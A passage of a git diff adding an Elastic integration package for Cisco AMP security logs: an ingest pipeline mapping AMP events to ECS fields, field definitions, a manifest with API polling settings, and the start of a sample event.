+  - {{tag}}
+{{/each}}
+{{#if preserve_original_event}}
+  - preserve_original_event
+{{/if}}
+{{#contains tags "forwarded"}}
+publisher_pipeline.disable_host: true
+{{/contains}}
+
+processors:
+  - decode_json_fields:
+      fields: [message]
+      target: json
+  - fingerprint:
+      fields:
+        - "json.data.timestamp"
+        - "json.data.timestamp_nanoseconds"
+        - "json.data.event_type_id"
+        - "json.data.connector_guid"
+        - "json.data.id"
+        - "json.data.detection_id"
+      target_field: "@metadata._id"
+      ignore_missing: true
+{{#if processors}}
+{{processors}}
+{{/if}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
new file mode 100644
index 00000000000..8d326db7306
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -0,0 +1,475 @@
+---
+description: Pipeline for parsing Cisco AMP logs
+processors:
+- rename:
+    field: message
+    target_field: event.original
+    ignore_missing: true
+- json:
+    field: event.original
+    target_field: json
+    if: ctx?.json == null
+#########################
+## ECS General Mapping ##
+#########################
+- rename:
+    field: json.data
+    target_field: cisco.amp
+    ignore_missing: true
+- remove:
+    field:
+    - "@timestamp"
+    ignore_missing: true
+    if: ctx?.cisco?.amp?.timestamp != null
+- date:
+    field: cisco.amp.timestamp
+    formats:
+      - UNIX
+    ignore_failure: true
+
+#######################
+## ECS Event Mapping ##
+#######################
+- set:
+    field: event.ingested
+    value: '{{_ingest.timestamp}}'
+- set:
+    field: ecs.version
+    value: '1.11.0'
+- set:
+    field: event.kind
+    value: alert
+- convert:
+    field: cisco.amp.id
+    target_field: event.id
+    type: string
+    ignore_missing: true
+- append:
+    field: event.category
+    value: file
+    if: ctx?.cisco?.amp?.file?.file_name != null
+- append:
+    field: event.category
+    value: malware
+    if: 'ctx?.cisco?.amp?.file?.disposition == "Malicious"'
+- rename:
+    field: cisco.amp.event_type
+    target_field: event.action
+    ignore_missing: true
+- set:
+    field: event.severity
+    value: 1
+    if: ctx?.cisco?.amp?.severity == 'Low'
+- set:
+    field: event.severity
+    value: 2
+    if: ctx?.cisco?.amp?.severity == 'Medium'
+- set:
+    field: event.severity
+    value: 3
+    if: ctx?.cisco?.amp?.severity == 'High'
+- set:
+    field: event.severity
+    value: 4
+    if: ctx?.cisco?.amp?.severity == 'Critical'
+- set:
+    field: event.severity
+    value: 0
+    if: ctx?.cisco?.amp?.severity == null
+- date:
+    field: cisco.amp.start_timestamp
+    target_field: event.start
+    formats: 
+      - UNIX
+    ignore_failure: true
+    if: ctx?.cisco?.amp?.start_timestamp != null
+
+- rename:
+    field: cisco.amp.techniques
+    target_field: cisco.amp.mitre_techniques
+    if: "ctx?.cisco?.amp?.techniques != null && ctx?.cisco?.amp?.techniques.length > 0 && ctx?.cisco?.amp?.techniques[0] instanceof String"
+- rename:
+    field: cisco.amp.tactics
+    target_field: cisco.amp.mitre_tactics
+    if: "ctx?.cisco?.amp?.tactics != null && ctx?.cisco?.amp?.tactics.length > 0 && ctx?.cisco?.amp?.tactics[0] instanceof String"
+
+######################
+## ECS Host Mapping ##
+######################
+- rename:
+    field: cisco.amp.computer.hostname
+    target_field: host.name
+    ignore_missing: true
+- set:
+    field: host.hostname
+    value: "{{ host.name }}"
+    if: ctx?.host?.name != null
+- rename:
+    field: cisco.amp.computer.user
+    target_field: host.user.name
+    ignore_missing: true
+
+#########################
+## ECS Network Mapping ##
+#########################
+- rename:
+    field: cisco.amp.network_info.nfm.protocol
+    target_field: network.transport
+    ignore_missing: true
+- set:
+    field: network.direction
+    value: egress
+    if: "ctx?.cisco?.amp?.network_info?.nfm?.direction == 'Outgoing connection from'"
+- set:
+    field: network.direction
+    value: ingress
+    if: "ctx?.cisco?.amp?.network_info?.nfm?.direction != null && ctx?.cisco?.amp?.network_info?.nfm?.direction != 'Outgoing connection from'"
+
+#####################
+## ECS URL Mapping ##
+#####################
+- uri_parts:
+    field: cisco.amp.network_info.dirty_url
+    target_field: url
+    keep_original: true
+    remove_if_successful: true
+    if: ctx?.cisco?.amp?.network_info?.dirty_url != null
+- rename:
+    field: cisco.amp.network_info.dirty_url
+    target_field: url.original
+    ignore_missing: true
+
+########################
+## ECS Source Mapping ##
+########################
+- rename:
+    field: cisco.amp.network_info.local_ip
+    target_field: source.ip
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.local_port
+    target_field: source.port
+    ignore_missing: true
+
+#############################
+## ECS Destination Mapping ##
+#############################
+- rename:
+    field: cisco.amp.network_info.remote_ip
+    target_field: destination.ip
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.remote_port
+    target_field: destination.port
+    ignore_missing: true
+
+######################
+## ECS File Mapping ##
+######################
+- rename:
+    field: cisco.amp.file.file_name
+    target_field: file.name
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.file_path
+    target_field: file.path
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.identity.sha256
+    target_field: file.hash.sha256
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.identity.sha1
+    target_field: file.hash.sha1
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.identity.md5
+    target_field: file.hash.md5
+    ignore_missing: true
+
+#####################
+## ECS OS Mapping ##
+#####################
+- set:
+    field: host.os.family
+    value: windows
+    if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")'
+- set:
+    field: host.os.platform
+    value: windows
+    if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")'
+
+#########################
+## ECS Process Mapping ##
+#########################
+- rename:
+    field: cisco.amp.file.parent.process_id
+    target_field: process.pid
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.process_id
+    target_field: process.pid
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.parent.file_name
+    target_field: process.name
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.parent.identity.sha256
+    target_field: process.hash.sha256
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.parent.identity.sha1
+    target_field: process.hash.sha1
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.parent.identity.md5
+    target_field: process.hash.md5
+    ignore_missing: true
+- rename:
+    field: cisco.amp.file.parent.identity.md5
+    target_field: process.hash.md5
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.file_name
+    target_field: process.name
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.identity.sha256
+    target_field: process.hash.sha256
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.identity.sha1
+    target_field: process.hash.sha1
+    ignore_missing: true
+- rename:
+    field: cisco.amp.network_info.parent.identity.md5
+    target_field: process.hash.md5
+    ignore_missing: true
+
+#########################
+## ECS Related Mapping ##
+#########################
+- append:
+    field: related.user
+    value: "{{ host.user.name }}"
+    if: ctx?.host?.user?.name != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ process.hash.sha256 }}"
+    if: ctx?.process?.parent?.hash?.sha256 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ process.hash.md5 }}"
+    if: ctx?.process?.parent?.hash?.md5 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ process.hash.sha1 }}"
+    if: ctx?.process?.parent?.hash?.sha1 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ file.hash.sha256 }}"
+    if: ctx?.file?.hash?.sha256 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ file.hash.md5 }}"
+    if: ctx?.file?.hash?.md5 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ file.hash.sha1 }}"
+    if: ctx?.file?.hash?.sha1 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ cisco.amp.network_info.parent.identity.sha256 }}"
+    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha256 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ cisco.amp.network_info.parent.identity.md5 }}"
+    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.md5 != null
+    allow_duplicates: false
+- append:
+    field: related.hash
+    value: "{{ cisco.amp.network_info.parent.identity.sha1 }}"
+    if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha1 != null
+    allow_duplicates: false
+- append:
+    field: related.hosts
+    value: "{{ host.name }}"
+    if: ctx?.host?.name != null
+    allow_duplicates: false
+- append:
+    field: related.ip
+    value: "{{ source.ip }}"
+    if: ctx?.source?.ip != null
+    allow_duplicates: false
+- append:
+    field: related.ip
+    value: "{{ destination.ip }}"
+    if: ctx?.destination?.ip != null
+    allow_duplicates: false
+- append:
+    field: related.ip
+    value: "{{ cisco.amp.computer.external_ip }}"
+    if: ctx?.cisco?.amp?.computer?.external_ip != null
+    allow_duplicates: false
+- script:
+    lang: painless
+    source: |
+        if (ctx?.related == null) {
+            ctx.related = new HashMap();
+        }
+        if (ctx?.related?.ip == null) {
+            ctx.related.ip = new ArrayList();
+        }
+        for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+            if (addr.ip != null && !addr.ip.isEmpty()) {
+                if (!ctx?.related?.ip.contains(addr.ip)) {
+                    ctx?.related?.ip.add(addr.ip);  
+                }
+            }
+        }
+    if: ctx?.cisco?.amp?.computer?.network_addresses != null
+- script:
+    lang: painless
+    source: |
+        if (ctx?.cisco?.amp?.related == null) {
+            ctx.cisco.amp.related = new HashMap();
+        }
+        if (ctx?.cisco?.amp?.related?.mac == null) {
+            ctx.cisco.amp.related.mac = new ArrayList();
+        }
+        for (addr in ctx?.cisco?.amp?.computer?.network_addresses) {
+            if (addr.mac != null && !addr.mac.isEmpty()) {
+                if (!ctx?.cisco?.amp?.related?.mac.contains(addr.mac)) {
+                    ctx?.cisco?.amp?.related?.mac.add(addr.mac);  
+                }
+            }
+        }
+    if: ctx?.cisco?.amp?.computer?.network_addresses != null
+- foreach:
+    field: cisco.amp.vulnerabilities
+    processor:
+      append:
+        field: cisco.amp.related.cve
+        value: "{{ _ingest._value.cve }}"
+        allow_duplicates: false
+    if: ctx?.cisco?.amp?.vulnerabilities != null
+
+#############
+## GeoIP ##
+#############
+- geoip:
+    field: source.ip
+    target_field: source.geo
+    ignore_missing: true
+    if: "ctx.source?.geo == null"
+- geoip:
+    field: destination.ip
+    target_field: destination.geo
+    ignore_missing: true
+    if: "ctx.destination?.geo == null"
+- geoip:
+    database_file: GeoLite2-ASN.mmdb
+    field: source.ip
+    target_field: source.as
+    properties:
+    - asn
+    - organization_name
+    ignore_missing: true
+- geoip:
+    database_file: GeoLite2-ASN.mmdb
+    field: destination.ip
+    target_field: destination.as
+    properties:
+    - asn
+    - organization_name
+    ignore_missing: true
+- rename:
+    field: source.as.asn
+    target_field: source.as.number
+    ignore_missing: true
+- rename:
+    field: source.as.organization_name
+    target_field: source.as.organization.name
+    ignore_missing: true
+- rename:
+    field: destination.as.asn
+    target_field: destination.as.number
+    ignore_missing: true
+- rename:
+    field: destination.as.organization_name
+    target_field: destination.as.organization.name
+    ignore_missing: true
+
+#############
+## Cleanup ##
+#############
+- date:
+    field: cisco.amp.threat_hunting.incident_start_time
+    target_field: cisco.amp.threat_hunting.incident_start_time
+    formats: 
+      - UNIX
+    ignore_failure: true
+    if: ctx?.cisco?.amp?.threat_hunting?.incident_start_time != null
+- date:
+    field: cisco.amp.threat_hunting.incident_end_time
+    target_field: cisco.amp.threat_hunting.incident_end_time
+    formats: 
+      - UNIX
+    ignore_failure: true
+    if: ctx?.cisco?.amp?.threat_hunting?.incident_end_time != null
+- script:
+    lang: painless
+    description: This script processor iterates over the whole document to remove fields with null values.
+    if: ctx?.json != null
+    source: |
+      void handleMap(Map map) {
+        for (def x : map.values()) {
+          if (x instanceof Map) {
+              handleMap(x);
+          } else if (x instanceof List) {
+              handleList(x);
+          }
+        }
+        map.values().removeIf(v -> v == null);
+      }
+      void handleList(List list) {
+        for (def x : list) {
+            if (x instanceof Map) {
+                handleMap(x);
+            } else if (x instanceof List) {
+                handleList(x);
+            }
+        }
+      }
+      handleMap(ctx);
+- remove:
+    field: event.original
+    if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))"
+    ignore_failure: true
+    ignore_missing: true
+- remove:
+    field:
+    - cisco.amp.timestamp
+    - cisco.amp.computer.links
+    - json
+    - cisco.amp.severity
+    - cisco.amp.start_timestamp
+    - cisco.amp.date
+    - cisco.amp.timestamp_nanoseconds
+    - cisco.amp.start_date
+    - cisco.amp.id
+    ignore_missing: true
+on_failure:
+- set:
+    field: error.message
+    value: '{{ _ingest.on_failure_message }}'
+
diff --git a/packages/cisco_amp/data_stream/log/fields/agent.yml b/packages/cisco_amp/data_stream/log/fields/agent.yml
new file mode 100644
index 00000000000..da4e652c53b
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/agent.yml
@@ -0,0 +1,198 @@
+- name: cloud
+  title: Cloud
+  group: 2
+  description: Fields related to the cloud or infrastructure the events are coming from.
+  footnote: 'Examples: If Metricbeat is running on an EC2 host and fetches data from its host, the cloud info contains the data about this machine. If Metricbeat runs on a remote machine outside the cloud and fetches data from a service running in the cloud, the field contains cloud data from the machine the service is running on.'
+  type: group
+  fields:
+    - name: account.id
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: 'The cloud account or organization id used to identify different entities in a multi-tenant environment.
+
+        Examples: AWS account id, Google Cloud ORG Id, or other unique identifier.'
+      example: 666777888999
+    - name: availability_zone
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Availability zone in which this host is running.
+      example: us-east-1c
+    - name: instance.id
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Instance ID of the host machine.
+      example: i-1234567890abcdef0
+    - name: instance.name
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Instance name of the host machine.
+    - name: machine.type
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Machine type of the host machine.
+      example: t2.medium
+    - name: provider
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Name of the cloud provider. Example values are aws, azure, gcp, or digitalocean.
+      example: aws
+    - name: region
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Region in which this host is running.
+      example: us-east-1
+    - name: project.id
+      type: keyword
+      description: Name of the project in Google Cloud.
+    - name: image.id
+      type: keyword
+      description: Image ID for the cloud instance.
+- name: container
+  title: Container
+  group: 2
+  description: 'Container fields are used for meta information about the specific container that is the source of information.
+
+    These fields help correlate data based containers from any runtime.'
+  type: group
+  fields:
+    - name: id
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: Unique container id.
+    - name: image.name
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Name of the image the container was built on.
+    - name: labels
+      level: extended
+      type: object
+      object_type: keyword
+      description: Image labels.
+    - name: name
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Container name.
+- name: host
+  title: Host
+  group: 2
+  description: 'A host is defined as a general computing instance.
+
+    ECS host.* fields should be populated with details about the host on which the event happened, or from which the measurement was taken. Host types include hardware, virtual machines, Docker containers, and Kubernetes nodes.'
+  type: group
+  fields:
+    - name: architecture
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: Operating system architecture.
+      example: x86_64
+    - name: domain
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: 'Name of the domain of which the host is a member.
+
+        For example, on Windows this could be the host''s Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host''s LDAP provider.'
+      example: CONTOSO
+      default_field: false
+    - name: hostname
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: 'Hostname of the host.
+
+        It normally contains what the `hostname` command returns on the host machine.'
+    - name: id
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: 'Unique host id.
+
+        As hostname is not always unique, use values that are meaningful in your environment.
+
+        Example: The current usage of `beat.name`.'
+    - name: ip
+      level: core
+      type: ip
+      description: Host ip addresses.
+    - name: mac
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: Host mac addresses.
+    - name: name
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: 'Name of the host.
+
+        It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use.'
+    - name: os.family
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: OS family (such as redhat, debian, freebsd, windows).
+      example: debian
+    - name: os.kernel
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Operating system kernel version as a raw string.
+      example: 4.4.0-112-generic
+    - name: os.name
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      multi_fields:
+        - name: text
+          type: text
+          norms: false
+          default_field: false
+      description: Operating system name, without the version.
+      example: Mac OS X
+    - name: os.platform
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Operating system platform (such centos, ubuntu, windows).
+      example: darwin
+    - name: os.version
+      level: extended
+      type: keyword
+      ignore_above: 1024
+      description: Operating system version as a raw string.
+      example: 10.14.1
+    - name: type
+      level: core
+      type: keyword
+      ignore_above: 1024
+      description: 'Type of host.
+
+        For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment.'
+    - name: containerized
+      type: boolean
+      description: >
+        If the host is a container.
+
+    - name: os.build
+      type: keyword
+      example: "18D109"
+      description: >
+        OS build information.
+
+    - name: os.codename
+      type: keyword
+      example: "stretch"
+      description: >
+        OS codename, if any.
+
diff --git a/packages/cisco_amp/data_stream/log/fields/base-fields.yml b/packages/cisco_amp/data_stream/log/fields/base-fields.yml
new file mode 100644
index 00000000000..51e5fe98f8e
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/base-fields.yml
@@ -0,0 +1,46 @@
+- name: data_stream.type
+  type: constant_keyword
+  description: Data stream type.
+- name: data_stream.dataset
+  type: constant_keyword
+  description: Data stream dataset.
+- name: data_stream.namespace
+  type: constant_keyword
+  description: Data stream namespace.
+- name: "@timestamp"
+  type: date
+  description: Event timestamp.
+- name: event.module
+  type: constant_keyword
+  description: Event module
+  value: cisco_amp
+- name: event.dataset
+  type: constant_keyword
+  description: Event dataset
+  value: cisco_amp.log
+- name: container.id
+  description: Unique container id.
+  ignore_above: 1024
+  type: keyword
+- name: input.type
+  description: Type of Filebeat input.
+  type: keyword
+- name: log.file.path
+  description: Full path to the log file this event came from.
+  example: /var/log/fun-times.log
+  ignore_above: 1024
+  type: keyword
+- name: log.source.address
+  description: Source address from which the log event was read / sent from.
+  type: keyword
+- name: log.flags
+  description: Flags for the log file.
+  type: keyword
+- name: log.offset
+  description: Offset of the entry in the log file.
+  type: long
+- name: tags
+  description: List of keywords used to tag each event.
+  example: '["production", "env2"]'
+  ignore_above: 1024
+  type: keyword
diff --git a/packages/cisco_amp/data_stream/log/fields/ecs.yml b/packages/cisco_amp/data_stream/log/fields/ecs.yml
new file mode 100644
index 00000000000..e8a6e3c5dae
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/ecs.yml
@@ -0,0 +1,84 @@
+- name: '@timestamp'
+  external: ecs
+- external: ecs
+  name: ecs.version
+- external: ecs
+  name: error.message
+- external: ecs
+  name: event.action
+- external: ecs
+  name: event.code
+- external: ecs
+  name: event.ingested
+- external: ecs
+  name: event.original
+- external: ecs
+  name: event.outcome
+- external: ecs
+  name: event.severity
+- external: ecs
+  name: event.category
+- external: ecs
+  name: event.id
+- external: ecs
+  name: event.timezone
+- name: related.ip
+  external: ecs
+- name: related.user
+  external: ecs
+- name: related.hosts
+  external: ecs
+- name: related.hash
+  external: ecs
+- name: process.name
+  external: ecs
+- name: process.pid
+  external: ecs
+- name: process.hash.md5
+  external: ecs
+- name: process.hash.sha1
+  external: ecs
+- name: process.hash.sha256
+  external: ecs
+- name: file.hash.md5
+  external: ecs
+- name: file.hash.sha1
+  external: ecs
+- name: file.hash.sha256
+  external: ecs
+- name: file.name
+  external: ecs
+- name: file.path
+  external: ecs
+- external: ecs
+  name: destination.address
+- external: ecs
+  name: destination.as.number
+- external: ecs
+  name: destination.as.organization.name
+- external: ecs
+  name: destination.domain
+- external: ecs
+  name: destination.geo.continent_name
+- external: ecs
+  name: destination.geo.country_iso_code
+- external: ecs
+  name: destination.geo.city_name
+- external: ecs
+  name: destination.geo.country_name
+- description: Longitude and latitude.
+  level: core
+  name: destination.geo.location
+  type: geo_point
+- external: ecs
+  name: destination.ip
+- external: ecs
+  name: destination.port
+- external: ecs
+  name: network.direction
+- external: ecs
+  name: network.transport
+- external: ecs
+  name: source.ip
+- external: ecs
+  name: source.port
diff --git a/packages/cisco_amp/data_stream/log/fields/fields.yml b/packages/cisco_amp/data_stream/log/fields/fields.yml
new file mode 100644
index 00000000000..e67370745fb
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/fields/fields.yml
@@ -0,0 +1,292 @@
+- name: cisco.amp
+  type: group
+  release: beta
+  default_field: false
+  description: >
+    Module for parsing Cisco AMP logs.
+
+  fields:
+    - name: timestamp_nanoseconds
+      type: date
+      description: >
+        The timestamp in Epoch nanoseconds.
+
+    - name: event_type_id
+      type: long
+      description: >
+        A sub ID of the event, depending on event type.
+
+    - name: detection
+      type: keyword
+      description: >
+        The name of the malware detected.
+
+    - name: detection_id
+      type: keyword
+      description: >
+        The ID of the detection.
+
+    - name: connector_guid
+      type: keyword
+      description: >
+        The GUID of the connector sending information to AMP.
+
+    - name: group_guids
+      type: keyword
+      description: >
+        An array of group GUIDS related to the connector sending information to AMP.
+
+    - name: vulnerabilities
+      type: flattened
+      description: >
+        An array of related vulnerabilities to the malicious event.
+
+    - name: scan.description
+      type: keyword
+      description: >
+        Description of an event related to a scan being initiated, for example the specific directory name.
+
+    - name: scan.clean
+      type: boolean
+      description: >
+        Boolean value if a scanned file was clean or not.
+
+    - name: scan.scanned_files
+      type: long
+      description: >
+        Count of files scanned in a directory.
+
+    - name: scan.scanned_processes
+      type: long
+      description: >
+        Count of processes scanned related to a single scan event.
+
+    - name: scan.scanned_paths
+      type: long
+      description: >
+        Count of different directories scanned related to a single scan event.
+
+    - name: scan.malicious_detections
+      type: long
+      description: >
+        Count of malicious files or documents detected related to a single scan event.
+
+    - name: computer.connector_guid
+      type: keyword
+      description: >
+        The GUID of the connector, similar to top level connector_guid, but unique if multiple connectors are involved.
+
+    - name: computer.external_ip
+      type: ip
+      description: >
+        The external IP of the related host.
+
+    - name: computer.active
+      type: boolean
+      description: >
+        If the current endpoint is active or not.
+
+    - name: computer.network_addresses
+      type: flattened
+      description: >
+        All network interface information on the related host.
+
+    - name: file.disposition
+      type: keyword
+      description: >
+        Categorization of file, for example "Malicious" or "Clean".
+
+    - name: network_info.disposition
+      type: keyword
+      description: >
+        Categorization of a network event related to a file, for example "Malicious" or "Clean".
+
+    - name: network_info.nfm.direction
+      type: keyword
+      description: >
+        The current direction based on source and destination IP.
+
+    - name: related.mac
+      type: keyword
+      description: >
+        An array of all related MAC addresses.
+
+    - name: related.cve
+      type: keyword
+      description: >
+        An array of all related CVEs
+
+    - name: cloud_ioc.description
+      type: keyword
+      description: >
+        Description of the related IOC for specific IOC events from AMP.
+
+    - name: cloud_ioc.short_description
+      type: keyword
+      description: >
+        Short description of the related IOC for specific IOC events from AMP.
+
+    - name: network_info.parent.disposition
+      type: keyword
+      description: >
+        Categorization of a IOC for example "Malicious" or "Clean".
+
+    - name: network_info.parent.identity.md5
+      type: keyword
+      description: >
+        MD5 hash of the related IOC.
+
+    - name: network_info.parent.identity.sha1
+      type: keyword
+      description: >
+        SHA1 hash of the related IOC.
+
+    - name: network_info.parent.identify.sha256
+      type: keyword
+      description: >
+        SHA256 hash of the related IOC.
+
+    - name: file.archived_file.disposition
+      type: keyword
+      description: >
+        Categorization of a file archive related to a file, for example "Malicious" or "Clean".
+
+    - name: file.archived_file.identity.md5
+      type: keyword
+      description: >
+        MD5 hash of the archived file related to the malicious event.
+
+    - name: file.archived_file.identity.sha1
+      type: keyword
+      description: >
+        SHA1 hash of the archived file related to the malicious event.
+
+    - name: file.archived_file.identity.sha256
+      type: keyword
+      description: >
+        SHA256 hash of the archived file related to the malicious event.
+
+    - name: file.attack_details.application
+      type: keyword
+      description: >
+        The application name related to Exploit Prevention events.
+
+    - name: file.attack_details.attacked_module
+      type: keyword
+      description: >
+        Path to the executable or dll that was attacked and detected by Exploit Prevention.
+
+    - name: file.attack_details.base_address
+      type: keyword
+      description: >
+        The base memory address related to the exploit detected.
+
+    - name: file.attack_details.suspicious_files
+      type: keyword
+      description: >
+        An array of related files when an attack is detected by Exploit Prevention.
+
+    - name: file.parent.disposition
+      type: keyword
+      description: >
+        Categorization of parrent, for example "Malicious" or "Clean".
+
+    - name: error.description
+      type: keyword
+      description: >
+        Description of an endpoint error event.
+
+    - name: error.error_code
+      type: long
+      description: >
+        The error code describing the related error event.
+
+    - name: threat_hunting.severity
+      type: keyword
+      description: >
+        Severity result of the threat hunt registered to the malicious event. Can be Low-Critical.
+
+    - name: threat_hunting.incident_report_guid
+      type: keyword
+      description: >
+        The GUID of the related threat hunting report.
+
+    - name: threat_hunting.incident_hunt_guid
+      type: keyword
+      description: >
+        The GUID of the related investigation tracking issue.
+
+    - name: threat_hunting.incident_title
+      type: keyword
+      description: >
+        Title of the incident related to the threat hunting activity.
+
+    - name: threat_hunting.incident_summary
+      type: keyword
+      description: >
+        Summary of the outcome on the threat hunting activity.
+
+    - name: threat_hunting.incident_remediation
+      type: keyword
+      description: >
+        Recommendations to resolve the vulnerability or exploited host.
+
+    - name: threat_hunting.incident_id
+      type: long
+      description: >
+        The id of the related incident for the threat hunting activity.
+
+    - name: threat_hunting.incident_end_time
+      type: date
+      description: >
+        When the threat hunt finalized or closed.
+
+    - name: threat_hunting.incident_start_time
+      type: date
+      description: >
+        When the threat hunt was initiated.
+
+    - name: file.attack_details.indicators
+      type: flattened
+      description: >
+        Different indicator types that matches the exploit detected, for example different MITRE tactics.
+
+    - name: threat_hunting.tactics
+      type: flattened
+      description: >
+        List of all MITRE tactics related to the incident found.
+
+    - name: threat_hunting.techniques
+      type: flattened
+      description: >
+        List of all MITRE techniques related to the incident found.
+
+    - name: tactics
+      type: flattened
+      description: >
+        List of all MITRE tactics related to the incident found.
+
+    - name: mitre_tactics
+      type: keyword
+      description: >
+        Array of all related mitre tactic ID's
+
+    - name: techniques
+      type: flattened
+      description: >
+        List of all MITRE techniques related to the incident found.
+
+    - name: mitre_techniques
+      type: keyword
+      description: >
+        Array of all related mitre technique ID's
+
+    - name: command_line.arguments
+      type: keyword
+      description: >
+        The CLI arguments related to the Cloud Threat IOC reported by Cisco.
+
+    - name: bp_data
+      type: flattened
+      description: >-
+        Endpoint isolation information
diff --git a/packages/cisco_amp/data_stream/log/manifest.yml b/packages/cisco_amp/data_stream/log/manifest.yml
new file mode 100644
index 00000000000..7eef1317b6d
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/manifest.yml
@@ -0,0 +1,92 @@
+title: Cisco AMP logs
+release: experimental
+type: logs
+streams:
+  - input: httpjson
+    vars:
+      - name: client_id
+        type: text
+        title: Client ID
+        description: Cisco AMP Client ID
+        multi: false
+        required: true
+        show_user: true
+      - name: api_key
+        type: password
+        title: API Key
+        description: Cisco AMP API Key
+        multi: false
+        required: true
+        show_user: true
+      - name: http_client_timeout
+        type: text
+        title: HTTP Client Timeout
+        multi: false
+        required: false
+        show_user: true
+        default: 60s
+      - name: interval
+        type: text
+        title: Interval
+        multi: false
+        required: true
+        show_user: true
+        description: Interval at which the logs will be pulled. The value must be between 2m and 1h.
+        default: 1h
+      - name: url
+        type: text
+        title: API URL.
+        description: The API URL
+        multi: false
+        required: true
+        show_user: false
+        default: https://api.amp.cisco.com/v1/events?offset=0&limit=300
+      - name: limit
+        type: text
+        title: Initial Interval
+        multi: false
+        required: true
+        show_user: false
+        description: Max number of logs pulled on each request
+        default: 100
+      - name: initial_interval
+        type: text
+        title: Initial Interval
+        multi: false
+        required: true
+        show_user: true
+        description: Initial Interval for first log pull
+        default: 24h
+      - name: ssl
+        type: yaml
+        title: SSL
+        multi: false
+        required: false
+        show_user: false
+      - name: tags
+        type: text
+        title: Tags
+        multi: true
+        required: true
+        show_user: true
+        default:
+          - cisco-amp
+          - forwarded
+      - name: preserve_original_event
+        required: true
+        show_user: true
+        title: Preserve original event
+        description: Preserves a raw copy of the original event, added to the field `event.original`
+        type: bool
+        multi: false
+        default: false
+      - name: processors
+        type: yaml
+        title: Processors
+        multi: false
+        required: false
+        show_user: false
+        description: "Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. \nThis executes in the agent before the logs are parsed. \nSee [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.\n"
+    template_path: httpjson.yml.hbs
+    title: Cisco AMP logs
+    description: Collect Cisco AMP logs via the API
diff --git a/packages/cisco_amp/data_stream/log/sample_event.json b/packages/cisco_amp/data_stream/log/sample_event.json
new file mode 100644
index 00000000000..1f71f309e9b
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/sample_event.json
@@ -0,0 +1,75 @@
+{
+    "@timestamp": "2021-01-14T14:41:05.000Z",
+    "file": {
+        "hash": {
+            "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        }
+    },
+    "ecs": {
+        "version": "1.11.0"
+    },
+    "related": {
+        "hosts": [
+            "Demo_WannaCry_Ransomware"
+        ],
+        "hash": [
+            "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+        ],
+        "ip": [
+            "8.8.8.8",
+            "10.10.10.10"
+        ]
+    },
+    "host": {
+        "name": "Demo_WannaCry_Ransomware",
+        "hostname": "Demo_WannaCry_Ransomware"
+    },
